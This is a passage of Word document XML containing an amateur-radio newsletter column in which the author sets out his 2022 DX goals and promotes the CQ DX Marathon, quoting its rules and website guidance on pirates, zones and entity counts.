    <w:p w14:paraId="080FBC5D" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EBA01B1" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">DAH DIT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAH   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DAH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DIT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DFCF33" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451CA095" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:ascii="Perpetua" w:eastAsia="Times New Roman" w:hAnsi="Perpetua" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">My Elmer (and OM), K8DWE (SK), convinced me early on that the only person that </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">I had to compete with on the bands was myself! I would never have the biggest station, best antennas, most power, etc. so I had to set goals for myself. During my career at HP, I learned about </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>stretch</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> goals. Most people set goals for themselves, but they either forget about them or make them too easy to attain. Additionally, you must revisit your goals frequently and set up procedures and practices that support your goals. What does all of this have to do with DX? I took these teachings to heart years ago and set several short term and long term goals. I review them annually and then monthly. I keep an eye out for things that can help me achieve these goals and implement those things when I can. My 2022 goals include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764951C9" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Long Term Goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D38E2B" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Achieving DXCC Honor Roll </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001F517" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Exceeding 2,000 on the ARRL DXCC Challenge roster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76245BBA" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Short Term Annual Goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDFEFBF" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Participate in the 8 major contests (CQWW DX RTTY, CQWW DX SSB, CQWW DX CW, CQWW WPX SSB, CQWW WPX CW, ARRL 160, CQ 160, and the 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Area QSO party.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD51ED" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">My annual goal is to exceed my previous years’ score in the annual CQ Marathon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C94FC" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Increase my 160M DXCC count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C87FA" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Achieve 12M DXCC (92 as of today)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69422F" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Work at least 6 entities every day via any mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701CE009" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Perpetua" w:eastAsia="Times New Roman" w:hAnsi="Perpetua" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ECBA6BE" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">What are your goals for 2022? I thought this would be a great topic as we are getting close to the end of the year. If you don’t have any goals, but like to chase DX, I would ask you to consider participating in the CQ Marathon DX chase. One of the great things about the award is that confirmations are not required. However, you need to be honest! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8890A" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The rules read “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">QSLs are not required.  The operator is expected to claim contacts only from stations the operator has every reason to believe are legitimate, and only to claim contacts in which an accurate two-way exchange was clearly accomplished. Scores will be adjusted by the DX Marathon committee for claimed contacts with pirates or any station not considered legitimate.  Submissions may be penalized or voided in cases </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>of fraud or poor sportsmanship. Every QSO may be subject to verification by the DX Marathon Manager. Decisions of the DX Marathon Manager are final.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793DF914" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59897A29" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The following information is from the CQ Marathon website (</w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r w:rsidRPr="00FC1FAE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.dxmarathon.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">) : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A206784" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting January 1 of each year, the DX Marathon is the perfect answer for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>DXer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> who needs that extra incentive to get on the air every day! Simply work as many countries and CQ Zones as you can in each calendar year, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>regardless of the band or mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">.  Each country and zone counts only once, so you can concentrate on working new ones rather than working the same ones on multiple bands and modes.  Many awards are given for the top overall scores in four classes plus top scores in modes, bands, US call areas and more! </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Each year there are pirates, operations that are not approved, callsigns that are copied incorrectly and unusual operations that are valid.   We attempt to document as many of these operations as possible - see the lists of valid callsigns, invalid callsigns, and callsign notes.  We encourage you to share your findings on pirates, illegal operations or confusing callsigns with us.  Please send your callsign updates to the DX Marathon administrator at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:r w:rsidRPr="00FC1FAE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>k9el@dxmarathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Many points are lost each year due to bad spots on the packet cluster network.  We have assembled an extensive list of bad spots - please check the list before entering any of these callsigns!</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Please check USA/VE zones carefully - use </w:t>
      </w:r>
      <w:hyperlink r:id="rId158" w:history="1">
        <w:r w:rsidRPr="00FC1FAE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.qrz.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check zones before submitting.  The number in the callsign does not necessarily match the location.  Did you know that West Virginia (W8) is in Zone 5?  and that Alabama (W4) is in Zone 4? Also, check Zone 2 submissions carefully. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>When a prefix can count for more than one country (e.g. E51) double check your entry. Although you can use the same QSO for a country and a Zone, if there is an error, two points will be lost!  We suggest using a different QSO for country and zone. Review your submission carefully and make sure your logging program country database is up to date.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">This list of separate countries (entities) for the CQ World Wide DX Contest and the CQ DX Marathon is based on a combination of the ARRL DXCC list, additional entities on the WAE (Worked All Europe) list and the Italian islands of Lampedusa (IG9) &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pantelleria</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IH9), in CQ Zone 33 off the coast of North Africa. This provides a total of 346 entities, based on 340 DXCC entities, six additional WAE entities (GM/Shetland, IT/Sicily, TA1/European Turkey, 4U1VIC, JW/Bear Is.) plus African Italy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182FE6A8" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Total CQ Countries: 346 (This list last updated February 11, 2018)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B07B40" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
